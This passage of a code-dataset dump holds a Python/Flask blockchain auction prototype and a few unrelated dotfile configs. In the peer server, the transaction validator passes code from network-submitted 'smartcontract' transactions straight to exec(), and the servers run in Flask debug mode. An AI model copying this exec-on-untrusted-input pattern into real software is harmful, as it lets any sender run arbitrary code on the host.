default='127.0.0.1',\n type=str, help='port to listen on')\n args = parser.parse_args()\n port = args.port\n\n CONNECTED_NODE_ADDRESS = 'http://{}:5000'.format(args.host)\n\n app.run(host='127.0.0.1', port=port, debug=True, threaded=True)\n" }, { "alpha_fraction": 0.6338862776756287, "alphanum_fraction": 0.6374407410621643, "avg_line_length": 32.7599983215332, "blob_id": "b3e9777d701c0fb0283bc0b4204e9183e20e3297", "content_id": "ed1e3b7f2e451d717bfdff75ad8ef82b8e4b9ca7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 844, "license_type": "no_license", "max_line_length": 99, "num_lines": 25, "path": "/block_server/block.py", "repo_name": "tranvien98/blockchain", "src_encoding": "UTF-8", "text": "import hashlib\nimport time\nimport json\n\nclass Block(object):\n def __init__(self, index, previous_hash, nonce, difficult, transactions, timestamp=None):\n self.index = index\n self.previous_hash = previous_hash\n self.nonce = nonce\n self.difficult = difficult\n self.transactions = transactions\n self.timestamp = timestamp or time.time()\n\n def compute_hash(self):\n\n block_string = json.dumps(self.__dict__, sort_keys=True)\n\n return hashlib.sha256(block_string.encode()).hexdigest()\n\n @staticmethod\n def from_dict(data_block):\n block = Block(data_block['index'], data_block['previous_hash'], data_block['nonce'], \n data_block['difficult'], data_block['transactions'], data_block['timestamp'])\n block.hash = data_block['hash']\n return block\n" }, { "alpha_fraction": 0.6113213896751404, "alphanum_fraction": 0.6222378611564636, "avg_line_length": 31.36182403564453, "blob_id": "f8a1550b4aee70a92d3013b104cfa3ed0292e755", "content_id": "055319ec97f8dcbf1dadcd29ebf852ff2e5f0559", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11411, "license_type": "no_license", "max_line_length": 210, "num_lines": 351, "path": "/block_server/genneral_peer.py", "repo_name": "tranvien98/blockchain", "src_encoding": "UTF-8", "text": "\"\"\"\nChưa làm các service liên quan đến transaction \n- Định nghĩa tran\n- Validate\n- Xử lý\n- Truy xuất dữ liệu từ block chain \n- Định nghĩa chain-code (smart contract)\n\"\"\"\nimport sys\nimport time\nimport requests\nfrom flask import Flask, jsonify, request\nimport threading\nfrom block import Block\nfrom blockchain import Blockchain\n\napp = Flask(__name__)\nanchors = set() # <ip>:<port>\nanchors.add('127.0.0.1:5001')\norders = set()\norders.add('127.0.0.1:5002')\nblockchain = Blockchain()\n\norderIp = \"127.0.0.1:5002\"\nanchorsIp = \"127.0.0.1:5001\"\nmyAddress = \"127.0.0.1:5000\"\n\[email protected]('/new_transaction', methods=['POST'])\ndef new_transaction():\n \"\"\"\n them transaction\n \"\"\"\n tx_data = request.get_json()\n\n required_fields = [\"type\", \"content\"]\n\n for field in required_fields:\n if not tx_data.get(field):\n return \"Invalid transaction data\", 404\n\n tx_data[\"timestamp\"] = time.time()\n\n blockchain.add_new_transaction(tx_data)\n\n url = 'http://{}/broadcast_transaction'.format(orderIp)\n response = requests.post(url, json=tx_data)\n \n return \"Success\", 201\n\n\[email protected]('/get_transaction', methods=['POST'])\ndef get_transaction():\n \"\"\"\n lấy giao dịch từ các nút khác\n \"\"\"\n \n tx_data = request.get_json()\n required_fields = [\"type\", \"content\", \"timestamp\"]\n\n for field in required_fields:\n if not tx_data.get(field):\n return \"Invalid transaction data\", 404\n\n blockchain.add_new_transaction(tx_data)\n\n return \"Success\", 201\n\n\n\"\"\"\nLấy nút cuối của chuỗi\n\"\"\"\[email protected]('/open_auctions', methods=['GET'])\ndef get_open_auctions():\n \n global blockchain\n\n url = 'http://{}/consensus'.format(orderIp)\n response = requests.get(url)\n length = response.json()['length']\n chain = response.json()['chain']\n longest_chain = Blockchain.from_list(chain)\n\n print(len(blockchain.chain), length)\n if len(blockchain.chain) < length and blockchain.check_chain_validity(longest_chain.chain):\n longest_chain.open_auctions = {}\n\n for block in longest_chain.chain:\n if not compute_open_auctions(block, longest_chain.open_auctions, longest_chain.chain_code):\n return \"Invalid Blockchain\", 400\n\n blockchain = longest_chain\n\n auctions = []\n for _ , auction in blockchain.open_auctions.items():\n auctions.append(auction)\n return jsonify({\"length\": len(blockchain.open_auctions),\n \"auctions\": list(auctions)})\n\n\[email protected]('/chain', methods=['GET'])\ndef get_chain():\n global blockchain\n\n url = 'http://{}/consensus'.format(orderIp)\n response = requests.get(url)\n\n length = response.json()['length']\n chain = response.json()['chain']\n longest_chain = Blockchain.from_list(chain)\n\n if len(blockchain.chain) < length and blockchain.check_chain_validity(longest_chain.chain):\n # kiem tra lai open_auction\n longest_chain.open_auctions = {}\n\n for block in longest_chain.chain:\n if not compute_open_auctions(block, longest_chain.open_auctions, longest_chain.chain_code):\n return \"Invalid Blockchain\", 400\n\n blockchain = longest_chain\n\n chain_data = []\n for block in blockchain.chain:\n chain_data.append(block.__dict__)\n return jsonify({\"length\": len(chain_data),\n \"chain\": chain_data})\n\n\[email protected]('/local_chain', methods=['GET'])\ndef get_local_chain():\n chain_data = []\n\n for block in blockchain.chain:\n chain_data.append(block.__dict__)\n\n return jsonify({\"length\": len(chain_data),\n \"chain\": chain_data})\n\[email protected]('/mine', methods=['GET'])\ndef mine():\n \"\"\"\n \n \"\"\"\n if not blockchain.unconfirmed_transactions:\n return jsonify({\"response\": \"None transactions 0x01\"})\n\n last_block = blockchain.last_block\n\n new_block = Block(last_block.index + 1, last_block.hash, 0, blockchain.difficulty, [])\n\n \n for transaction in blockchain.unconfirmed_transactions:\n if not validate_transaction(transaction):\n continue\n new_block.transactions.append(transaction)\n\n\n blockchain.unconfirmed_transactions = []\n\n if (len(new_block.transactions) == 0):\n return jsonify({\"response\": \"Error none transactions x02\"})\n\n proof = blockchain.proof_of_work(new_block)\n blockchain.add_block(new_block, proof)\n\n\n url = 'http://{}/broadcast_block'.format(orderIp)\n response = requests.post(url, json=new_block.__dict__)\n\n result = new_block.index\n\n if not result:\n return jsonify({\"response\": \" Error none transactions x02\"})\n return jsonify({\"response\": \"Block #{} is mined.\".format(result)})\n\n\n\[email protected]('/add_block', methods=['POST'])\ndef validate_and_add_block():\n global blockchain\n\n data_block = request.get_json()\n\n block = Block(data_block['index'], data_block['previous_hash'], data_block['nonce'],\n data_block['difficult'], data_block['transactions'], data_block['timestamp'])\n\n tmp_open_auctions = blockchain.open_auctions\n tmp_chain_code = blockchain.chain_code\n\n if not compute_open_auctions(block, tmp_open_auctions, tmp_chain_code):\n return \"The block was discarded by the node\", 400\n\n blockchain.open_auctions = tmp_open_auctions\n blockchain.chain_code = tmp_chain_code\n\n proof = data_block['hash']\n added = blockchain.add_block(block, proof)\n\n if not added:\n return \"The block was discarded by the node\", 400\n\n return \"Block added to the chain\", 201\n\n\[email protected]('/pending_tx')\ndef get_pending_tx():\n return jsonify(blockchain.unconfirmed_transactions)\n\n\[email protected]('/list_nodes', methods=['GET', 'POST'])\ndef list_node():\n url = 'http://{}/list_nodes'.format(orderIp)\n response = requests.get(url)\n\n data = response.json()\n\n return jsonify(data)\n\n\ndef validate_transaction(transaction):\n global blockchain\n #Kiểm tra quyền của giao dịch\n author = transaction['content']['author']\n print(author)\n url = 'http://{}/validate_permission'.format(anchorsIp)\n response = requests.post(\n url, json={'peer': author, 'action': transaction['type']})\n\n if response.json()['decision'] != 'accept':\n print(\"Reject from server\")\n return False\n\n if transaction['type'].lower() == 'open':\n id_auctioneer = transaction['content']['id_auctioneer']\n if id_auctioneer in blockchain.open_auctions:\n return False\n if transaction['content']['price_bidder'] < 0:\n return False\n blockchain.open_auctions[id_auctioneer] = transaction['content']\n blockchain.timeout[id_auctioneer] = True\n try:\n thread = threading.Thread(target=blockchain.chain_code[transaction['content']['contract']], args=(\n lambda: blockchain.timeout[id_auctioneer], transaction['content']['author'], transaction['content']['id_auctioneer'], transaction['content']['connect'], ))\n thread.start()\n except :\n print('Error contract x02')\n return True\n elif transaction['type'].lower() == 'auctioning':\n id_auctioneer = transaction['content']['id_auctioneer']\n if transaction['content']['price_bidder'] < 0:\n return False\n if id_auctioneer in blockchain.open_auctions and blockchain.open_auctions[id_auctioneer]['status'] == 'opening':\n price_bidder = transaction['content']['price_bidder']\n try:\n blockchain.open_auctions[id_auctioneer]['id_bidder']\n except KeyError:\n blockchain.open_auctions[id_auctioneer]['id_bidder'] = None\n if blockchain.open_auctions[id_auctioneer]['id_bidder'] is not None:\n if (blockchain.open_auctions[id_auctioneer]['id_bidder'] != transaction['content']['id_bidder']):\n return False\n if float(blockchain.open_auctions[id_auctioneer]['price_bidder']) < price_bidder :\n blockchain.open_auctions[id_auctioneer]['price_bidder'] = price_bidder\n blockchain.open_auctions[id_auctioneer]['id_bidder'] = transaction['content']['id_bidder']\n return True\n return False\n return False\n \n elif transaction['type'].lower() == 'close':\n id_auctioneer = transaction['content']['id_auctioneer']\n if id_auctioneer in blockchain.open_auctions and blockchain.open_auctions[id_auctioneer]['author'] == transaction['content']['author'] and blockchain.open_auctions[id_auctioneer]['status'] == 'opening':\n blockchain.open_auctions[id_auctioneer]['status'] = 'closed'\n return True\n return False\n elif transaction['type'].lower() == 'smartcontract':\n \n\n try:\n exec(transaction['content']['code'],blockchain.chain_code, blockchain.chain_code)\n return True\n except:\n print('Error contract x01')\n return False\n elif transaction['type'].lower() == 'execute':\n id_auctioneer = transaction['content']['id_auctioneer']\n try:\n blockchain.timeout[id_auctioneer] = False\n time.sleep(0.6)\n blockchain.timeout[id_auctioneer] = True\n thread = threading.Thread(target=blockchain.chain_code[transaction['content']['contract']], args=(\n lambda: blockchain.timeout[id_auctioneer], transaction['content']['author'], transaction['content']['id_auctioneer'], transaction['content']['connect'], ))\n thread.start()\n return True\n except:\n print('Error contract x03')\n return False\n \n\n\ndef compute_open_auctions(block, open_auctions, chain_code):\n for transaction in block.transactions:\n \n author = transaction['content']['author']\n url = 'http://{}/validate_permission'.format(anchorsIp)\n response = requests.post(\n url, json={'peer': author, 'action': transaction['type']})\n\n if response.json()['decision'] != 'accept':\n print(\"Reject from server\")\n return False\n if transaction['type'].lower() == 'open':\n id_auctioneer = transaction['content']['id_auctioneer']\n if id_auctioneer not in open_auctions:\n open_auctions[id_auctioneer] = transaction['content']\n return True\n else:\n return True\n return True\n\n\ndef join_network(anchorsIp):\n data = {\n 'port' : \"5000\"\n }\n try:\n url = 'http://{}/add_node'.format(anchorsIp)\n response = requests.post(url, json=data)\n print('Connection successfull')\n return True\n except:\n print(\"Connection refused by the server..\")\n\n return False\n\n\nif __name__ == '__main__':\n from argparse import ArgumentParser\n parser = ArgumentParser()\n parser.add_argument('-p', '--port', default=5000,\n type=int, help='port to listen on')\n parser.add_argument('-a', '--anchorsIp', default='127.0.0.1',\n type=str, help='port to listen on')\n args = parser.parse_args()\n port = args.port\n anchorsIp = args.anchorsIp\n anchorsIp = anchorsIp + \":5001\"\n\n \n while not join_network(anchorsIp):\n print(\"Let me sleep for 10 seconds\")\n time.sleep(1)\n\n app.run(host='127.0.0.1',port=port, debug=True, threaded=True)\n" }, { "alpha_fraction": 0.5606680512428284, "alphanum_fraction": 0.5644171833992004, "avg_line_length": 26.16666603088379, "blob_id": "1fe593c28c6d1fbef0f51e5484c84047eca197a7", "content_id": "d0222030d1f91cdd3b1eca6a25e06217a329acec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3021, "license_type": "no_license", "max_line_length": 85, "num_lines": 108, "path": "/block_server/blockchain.py", "repo_name": "tranvien98/blockchain", "src_encoding": "UTF-8", "text": "from block import Block\nimport time\n\nclass Blockchain(object):\n difficulty = 2\n def __init__(self):\n self.chain = []\n self.timeout = {};\n self.create_genesis_block()\n self.unconfirmed_transactions = []\n self.open_auctions = {}\n self.chain_code = {'chain': self.chain, 'open_auctions': self.open_auctions,\n 'unconfirmed_transactions': self.unconfirmed_transactions}\n def from_list(data_chain):\n blockchain = Blockchain()\n blockchain.chain = []\n blockchain.unconfirmed_transactions = []\n for data_block in data_chain:\n block = Block.from_dict(data_block)\n blockchain.chain.append(block)\n\n return blockchain\n\n def make_json(self):\n chain_data = []\n\n for block in self.chain:\n chain_data.append(block.__dict__)\n \n return chain_data\n\n def create_genesis_block(self):\n \"\"\"\n Tạo khối genesis và gắn nó vào chuỗi.\n      \n \"\"\"\n genesis_block = Block(0, 0, 0, 2, [])\n\n self.proof_of_work(genesis_block)\n\n genesis_block.hash = genesis_block.compute_hash()\n\n self.chain.append(genesis_block)\n @property\n def last_block(self):\n return self.chain[-1]\n\n def add_block(self, block, proof):\n \"\"\"\n Thêm khối vào chuỗi sau khi xác minh.\n        Xác minh bao gồm:\n        * Kiểm tra proof là hợp lệ.\n        * previous_hash đã tham chiếu trong khối và hàm băm của khối mới nhất\n          trong chuỗi.\n \"\"\"\n previous_hash = self.last_block.hash\n\n if previous_hash != block.previous_hash:\n return False\n\n if not Blockchain.is_valid_proof(block, proof):\n return False\n\n block.hash = proof\n self.chain.append(block)\n return True\n\n def proof_of_work(self, block):\n \n block.nonce = 0\n\n computed_hash = block.compute_hash()\n while not computed_hash.startswith('0' * Blockchain.difficulty):\n block.nonce += 1\n computed_hash = block.compute_hash()\n\n return computed_hash\n\n def add_new_transaction(self, transaction):\n self.unconfirmed_transactions.append(transaction)\n\n @classmethod\n def is_valid_proof(cls, block, block_hash):\n \"\"\"\n\n \"\"\"\n\n return (block_hash.startswith('0' * Blockchain.difficulty) and\n block_hash == block.compute_hash())\n\n @classmethod\n def check_chain_validity(cls, chain):\n result = True\n previous_hash = \"0\"\n\n for block in chain:\n block_hash = block.hash\n \n delattr(block, \"hash\")\n\n if not cls.is_valid_proof(block, block_hash) or \\\n previous_hash != block.previous_hash:\n result = False\n break\n\n block.hash, previous_hash = block_hash, block_hash\n\n return result\n" }, { "alpha_fraction": 0.584095299243927, "alphanum_fraction": 0.5932391285896301, "avg_line_length": 24.5744686126709, "blob_id": "c89943d3236be243a9479f206f54b887b74a093a", "content_id": "5483880b1360fd36600917aeeee918061713448d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3614, "license_type": "no_license", "max_line_length": 97, "num_lines": 141, "path": "/block_server/order.py", "repo_name": "tranvien98/blockchain", "src_encoding": "UTF-8", "text": "import requests\nfrom flask import Flask, jsonify, request\n\nfrom block import Block\nfrom blockchain import Blockchain\n\napp = Flask(__name__)\n\n\nanchors = set()\n\n\[email protected]('/add_node', methods=['POST'])\ndef register_new_anchors():\n data = request.get_json()\n\n if not data:\n return 'Invalid data', 400\n\n request_addr = data['ipaddress']\n port = data['port']\n node = request_addr + ':' + str(port)\n\n if not node:\n return \"Invalid data\", 400\n\n anchors.add(node)\n\n return \"Success\", 201\n\n\[email protected]('/broadcast_block', methods=['POST'])\ndef announce_new_block():\n \"\"\"\n\n \"\"\"\n block = Block.from_dict(request.get_json())\n if not block:\n \treturn \"Invalid data at announce_new_block\", 400\n\n request_addr = request.remote_addr\n\n offline_node = []\n\n for peer in anchors:\n try:\n if peer.find(request_addr) != -1:\n continue\n url = \"http://{}/add_block\".format(peer)\n requests.post(url, json=block.__dict__)\n except requests.exceptions.ConnectionError:\n print('Cant connect to node {}. Remove it from peer list'.format(peer))\n offline_node.append(peer)\n\n for peer in offline_node:\n anchors.remove(peer)\n\n return \"Success\", 201\n\n\[email protected]('/broadcast_transaction', methods=['POST'])\ndef announce_new_transaction():\n\n data = request.get_json()\n if not data:\n return \"Invalid data at announce_new_block\", 400\n\n request_addr = request.remote_addr\n\n offline_node = []\n\n for peer in anchors:\n try:\n if peer.find(request_addr) != -1:\n continue\n url = \"http://{}/get_transaction\".format(peer)\n requests.post(url, json=data)\n except requests.exceptions.ConnectionError:\n print('Cant connect to node {}. Remove it from peer list'.format(peer))\n offline_node.append(peer)\n\n for peer in offline_node:\n anchors.remove(peer)\n\n return \"Success\", 201\n\n\[email protected]('/consensus', methods=['GET'])\ndef consensus():\n \"\"\"\n\n \"\"\"\n longest_chain = Blockchain()\n current_len = len(longest_chain.chain)\n\n offline_node = []\n\n for peer in anchors:\n try:\n response = requests.get('http://{}/local_chain'.format(peer))\n length = response.json()['length']\n chain = response.json()['chain']\n new_blockchain = Blockchain.from_list(chain)\n\n if length > current_len and longest_chain.check_chain_validity(new_blockchain.chain):\n current_len = length\n longest_chain = new_blockchain\n except requests.exceptions.ConnectionError:\n print('Cant connect to node {}. Remove it from anchors list'.format(peer))\n offline_node.append(peer)\n\n for peer in offline_node:\n anchors.remove(peer)\n\n chain_data = []\n\n for block in longest_chain.chain:\n chain_data.append(block.__dict__)\n\n return jsonify({\"length\": len(chain_data),\n \"chain\": chain_data})\n\n# in ra số lượng node\[email protected]('/list_nodes', methods=['GET', 'POST'])\ndef get_node():\n result = {\n 'Nodes in System': list(anchors),\n 'Count of Nodes': len(anchors)\n }\n return jsonify(result)\n\n\nif __name__ == '__main__':\n from argparse import ArgumentParser\n parser = ArgumentParser()\n parser.add_argument('-p', '--port', default=5002,\n type=int, help='port to listen on')\n args = parser.parse_args()\n port = args.port\n\n app.run(host='127.0.0.1', port=port, debug=True, threaded=True)\n\n\n\n" }, { "alpha_fraction": 0.6200000047683716, "alphanum_fraction": 0.6466666460037231, "avg_line_length": 20.402597427368164, "blob_id": "51e30ebefb12a0faab53f49d13dfeffad366a9ab", "content_id": "2b5e8989d9e6918415b77399230610eafb08ed6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1650, "license_type": "no_license", "max_line_length": 89, "num_lines": 77, "path": "/block_server/anchor.py", "repo_name": "tranvien98/blockchain", "src_encoding": "UTF-8", "text": "import requests\nfrom flask import Flask, jsonify, request\nfrom block import Block\n\napp = Flask(__name__)\ngeneral_nodes = set()\n\n\ngroups = {}\n\n# O : Open | C : Close | A : Auction\npermission = {'admin': 'OCASE', 'peer': 'OCASE', 'guest': 'S'}\n\ngroups['127.0.0.1:5000'] = 'admin'\n\n\[email protected]('/add_node', methods=['GET', 'POST'])\ndef validate_connection():\n\tprint(\"connect....\")\n\tdata = request.get_json()\n\trequest_addr = request.remote_addr\n\tprint(request_addr)\n\tprint(request_addr)\n\tif not data:\n\t\treturn 'Invalid data', 400\n\n\n\tnode = request_addr + ':' + str(data['port'])\n\tif not node:\n\t\treturn 'Invalid data', 400\n\n\tgeneral_nodes.add(node)\n\n\tif node not in groups:\n\t\tgroups[node] = 'peer'\n\n\turl = 'http://{}:5002/add_node'.format(request_addr)\n\tresponse = requests.post(\n\t\turl, json={'ipaddress': request_addr, 'port': data['port']})\n\n\tif response.status_code >= 400:\n\t\treturn 'Error to connect to order', 400\n\n\treturn \"Success\", 201\n\n\[email protected]('/validate_permission', methods=['POST'])\ndef validate_permission():\n\n\tdata = request.get_json()\n\tif not data:\n\t\treturn 'Invalid data', 400\n\n\tnode = data[\"peer\"]\n\n\taction = data[\"action\"]\n\n\tif not node in groups:\n\t\tgroups[node] = 'guest'\n\n\tif permission[groups[node]].find(action[0].upper()) != -1:\n\t\treturn jsonify({'decision': 'accept'})\n\n\treturn jsonify({'decision': 'reject'})\n\n\n\nif __name__ == '__main__':\n from argparse import ArgumentParser\n\n parser = ArgumentParser()\n parser.add_argument('-p', '--port', default=5001, type=int, help='port to listen on')\n args = parser.parse_args()\n port = args.port\n\n\n app.run(host='127.0.0.1',port=port, debug = True, threaded = True)\n\n\n" } ]
7
jamesatha/bug-bash-cluster
https://github.com/jamesatha/bug-bash-cluster
5779180646ee493f10f2a438a13bda7f133158fd
2808d88438ae0c33dbba0b104b81ff76a94a86d6
ff8c36977bd24510a2c6e45fb9309b044ecce756
refs/heads/master
2020-09-10T15:45:58.172821
2019-11-14T16:50:55
2019-11-14T16:50:55
221,744,856
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.699999988079071, "alphanum_fraction": 0.699999988079071, "avg_line_length": 26.5, "blob_id": "afffc65b0083af4ef602457ba2f1f19e51e21211", "content_id": "c29938a52b3e5c60c6bd56f06afc72e801b9616e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 110, "license_type": "no_license", "max_line_length": 54, "num_lines": 4, "path": "/src/github_backed_test.py", "repo_name": "jamesatha/bug-bash-cluster", "src_encoding": "UTF-8", "text": "from . import github_backed\n\ndef test_github_backed():\n assert github_backed.apply(\"Jane\") == \"hello Jane\"\n" }, { "alpha_fraction": 0.7604166865348816, "alphanum_fraction": 0.8229166865348816, "avg_line_length": 47, "blob_id": "b69fe53909d570c1f288d1b9f9b4634f4645680b", "content_id": "08047175d27726c163e68eaa72380e95282b2323", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 96, "license_type": "no_license", "max_line_length": 76, "num_lines": 2, "path": "/README.md", "repo_name": "jamesatha/bug-bash-cluster", "src_encoding": "UTF-8", "text": "# bug-bash-cluster\nSource for https://bash201910.enthalpy.click/algorithms/jamesa/github_backed\n" } ]
2
MaikKlein/dotfiles
https://github.com/MaikKlein/dotfiles
497445406012f12f10a82ac71f1138c24a2c9ffb
a2b8a02b6929c36b41db3ad3bec932da48a6665e
de11d3e3865740be1654b4d9314803bbba36ae22
refs/heads/master
2023-06-07T20:54:50.923220
2023-05-27T12:47:48
2023-05-27T12:47:48
13,860,261
4
1
null
null
null
null
null
[ { "alpha_fraction": 0.47105705738067627, "alphanum_fraction": 0.4742030203342438, "avg_line_length": 39.5787239074707, "blob_id": "986414be865f33bf2d6474b1e1ed4377807e64b5", "content_id": "6d4d250216a7d6d94692663a904ac56c6d7ff01e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Lua", "length_bytes": 9536, "license_type": "no_license", "max_line_length": 106, "num_lines": 235, "path": "/awesome/config/keys.lua", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "local apps = require(\"config.apps\")\nlocal layouts = require(\"config.layouts\")\n\nlocal awful = require(\"awful\")\nlocal naughty = require(\"naughty\")\nlocal gears = require(\"gears\")\n\nlocal modkey = \"Mod1\"\n\nlocal general = gears.table.join(\n -- awful.key({ modkey, }, \"s\", hotkeys_popup.show_help,\n -- {description=\"show help\", group=\"awesome\"}),\n -- awful.key({ modkey, }, \"Left\", awful.tag.viewprev,\n -- {description = \"view previous\", group = \"tag\"}),\n -- awful.key({ modkey, }, \"Right\", awful.tag.viewnext,\n -- {description = \"view next\", group = \"tag\"}),\n -- awful.key({ modkey, }, \"Escape\", awful.tag.history.restore,\n -- {description = \"go back\", group = \"tag\"}),\n\n -- awful.key({ modkey, }, \"j\",\n -- function ()\n -- awful.client.focus.byidx( 1)\n -- end,\n -- {description = \"focus next by index\", group = \"client\"}\n -- ),\n -- awful.key({ modkey, }, \"k\",\n -- function ()\n -- awful.client.focus.byidx(-1)\n -- end,\n -- {description = \"focus previous by index\", group = \"client\"}\n -- ),\n -- awful.key({ modkey, }, \"w\", function () mymainmenu:show() end,\n -- {description = \"show main menu\", group = \"awesome\"}),\n\n -- Layout manipulation\n\n awful.key({ modkey, \"Control\" }, \"Left\", function () awful.screen.focus_relative( 1) end,\n {description = \"focus the next screen\", group = \"screen\"}),\n\n awful.key({ modkey, \"Control\" }, \"Right\", function () awful.screen.focus_relative(-1) end,\n {description = \"focus the previous screen\", group = \"screen\"}),\n\n awful.key({ modkey, }, \"u\", awful.client.urgent.jumpto,\n {description = \"jump to urgent client\", group = \"client\"}),\n awful.key({ modkey, }, \"Tab\",\n function ()\n awful.client.focus.history.previous()\n if client.focus then\n client.focus:raise()\n end\n end,\n {description = \"go back\", group = \"client\"}),\n awful.key(\n {\"Ctrl\", },\n \"m\",\n function ()\n awful.client.focus.byidx(-1)\n end,\n {description = \"drun\", group = \"launcher\"}\n ),\n\n -- Standard program\n awful.key({modkey, },\n \"space\",\n function () awful.spawn(\"rofi -show drun\") end,\n {description = \"drun\", group = \"launcher\"}),\n awful.key({},\n \"Print\",\n nil,\n function () awful.util.spawn_with_shell(\"i3-scrot\") end,\n {description = \"drun\", group = \"launcher\"}),\n awful.key({\"Ctrl\", },\n \"Print\",\n nil,\n function () awful.util.spawn_with_shell(\"i3-scrot -s\") end,\n {description = \"drun\", group = \"launcher\"}),\n\n awful.key({ modkey, }, \"Return\", function () awful.spawn(apps.terminal) end,\n {description = \"open a terminal\", group = \"launcher\"}),\n\n awful.key({ modkey, \"Control\" }, \"r\", awesome.restart,\n {description = \"reload awesome\", group = \"awesome\"}),\n awful.key({ modkey, \"Shift\" }, \"q\", awesome.quit,\n {description = \"quit awesome\", group = \"awesome\"}),\n\n awful.key({ modkey, }, \"l\", function () awful.tag.incmwfact( 0.05) end,\n {description = \"increase master width factor\", group = \"layout\"}),\n awful.key({ modkey, }, \"h\", function () awful.tag.incmwfact(-0.05) end,\n {description = \"decrease master width factor\", group = \"layout\"}),\n awful.key({ modkey, \"Shift\" }, \"h\", function () awful.tag.incnmaster( 1, nil, true) end,\n {description = \"increase the number of master clients\", group = \"layout\"}),\n awful.key({ modkey, \"Shift\" }, \"l\", function () awful.tag.incnmaster(-1, nil, true) end,\n {description = \"decrease the number of master clients\", group = \"layout\"}),\n awful.key({ modkey, \"Control\" }, \"h\", function () awful.tag.incncol( 1, nil, true) end,\n {description = \"increase the number of columns\", group = \"layout\"}),\n awful.key({ modkey, \"Control\" }, \"l\", function () awful.tag.incncol(-1, nil, true) end,\n {description = \"decrease the number of columns\", group = \"layout\"}),\n -- awful.key({ modkey, }, \"space\", function () awful.layout.inc( 1) end,\n -- {description = \"select next\", group = \"layout\"}),\n\n awful.key({modkey, \"Shift\"},\n \"space\",\n function () awful.layout.inc(-1) end,\n {description = \"select previous\", group = \"layout\"}),\n\n awful.key({ modkey, \"Control\" }, \"n\",\n function ()\n local c = awful.client.restore()\n -- Focus restored client\n if c then\n c:emit_signal(\n \"request::activate\", \"key.unminimize\", {raise = true}\n )\n end\n end,\n {description = \"restore minimized\", group = \"client\"}),\n\n -- Prompt\n -- awful.key({ modkey }, \"r\", function () awful.screen.focused().mypromptbox:run() end,\n -- {description = \"run prompt\", group = \"launcher\"}),\n\n awful.key({ modkey }, \"x\",\n function ()\n awful.prompt.run {\n prompt = \"Run Lua code: \",\n textbox = awful.screen.focused().mypromptbox.widget,\n exe_callback = awful.util.eval,\n history_path = awful.util.get_cache_dir() .. \"/history_eval\"\n }\n end,\n {description = \"lua execute prompt\", group = \"awesome\"}),\n -- Menubar\n awful.key({ modkey }, \"p\", function() menubar.show() end,\n {description = \"show the menubar\", group = \"launcher\"}),\n awful.key(\n { modkey },\n \"t\",\n function()\n awful.layout.set(\"tile\", awful.screen.focused())\n end,\n {description = \"show the menubar\", group = \"launcher\"})\n)\n\nfor _, dir in ipairs({\"Left\", \"Right\", \"Up\", \"Down\"}) do\n local lower_dir = string.lower(dir)\n local focus =\n awful.key(\n {modkey, },\n dir,\n function ()\n local screen = awful.screen.focused()\n local layout = awful.layout.get(screen)\n local layout_name = awful.layout.getname(layout)\n if(layout_name == \"tile\" ) then\n awful.client.focus.bydirection(lower_dir, nil, true)\n else\n if dir == \"Up\" then\n awful.client.focus.byidx(-1)\n end\n if dir == \"Down\" then\n awful.client.focus.byidx(1)\n end\n end\n\n end,\n {description = \"focus \" .. dir .. \"client\", group = \"client\"}\n )\n\n local swap = \n awful.key(\n {modkey, \"Shift\"},\n dir,\n function () awful.client.swap.bydirection(lower_dir) end,\n {description = \"swap the \" .. dir .. \" client\", group = \"client\"})\n\n general = gears.table.join(general, focus, swap)\nend\n\n\n\nlocal workspace = {}\n-- Bind all key numbers to tags.\n-- Be careful: we use keycodes to make it work on any keyboard layout.\n-- This should map on the top row of your keyboard, usually 1 to 9.\nfor i = 1, 9 do\n workspace = gears.table.join(workspace,\n -- View tag only.\n awful.key({ \"Control\" }, \"#\" .. i + 9,\n function ()\n local screen = awful.screen.focused()\n local tag = screen.tags[i]\n if tag then\n tag:view_only()\n end\n end,\n {description = \"view tag #\"..i, group = \"tag\"}),\n -- Toggle tag display.\n awful.key({ modkey, \"Control\" }, \"#\" .. i + 9,\n function ()\n local screen = awful.screen.focused()\n local tag = screen.tags[i]\n if tag then\n awful.tag.viewtoggle(tag)\n end\n end,\n {description = \"toggle tag #\" .. i, group = \"tag\"}),\n -- Move client to tag.\n awful.key({ \"Control\", \"Shift\" }, \"#\" .. i + 9,\n function ()\n if client.focus then\n local tag = client.focus.screen.tags[i]\n if tag then\n client.focus:move_to_tag(tag)\n end\n end\n end,\n {description = \"move focused client to tag #\"..i, group = \"tag\"}),\n -- Toggle tag on focused client.\n awful.key({ modkey, \"Control\", \"Shift\" }, \"#\" .. i + 9,\n function ()\n if client.focus then\n local tag = client.focus.screen.tags[i]\n if tag then\n client.focus:toggle_tag(tag)\n end\n end\n end,\n {description = \"toggle focused client on tag #\" .. i, group = \"tag\"})\n )\nend\n\nreturn {\n general = general,\n workspace = workspace\n}\n" }, { "alpha_fraction": 0.6404958963394165, "alphanum_fraction": 0.6487603187561035, "avg_line_length": 23.200000762939453, "blob_id": "4d9f6f1f2cebb3e4035b5ed02cdb8a1c281e2d47", "content_id": "3d4a6123e861ceeaddb36e0c4906053399829719", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 242, "license_type": "no_license", "max_line_length": 68, "num_lines": 10, "path": "/penrose/config/polybar/launch.sh", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "#!/usr/bin/env sh\n\nkillall -q polybar\nwhile pgrep -u $UID -x polybar >/dev/null; do\n sleep 1;\ndone\n\nfor m in $(xrandr --query | grep \" connected\" | cut -d\" \" -f1); do\n MONITOR=$m polybar --reload main -c ~/.config/polybar/config.ini &\ndone\n" }, { "alpha_fraction": 0.753505527973175, "alphanum_fraction": 0.7616236209869385, "avg_line_length": 45.72413635253906, "blob_id": "2f20fb7ba6e10c604f300fec4dc55de6c3d70d5f", "content_id": 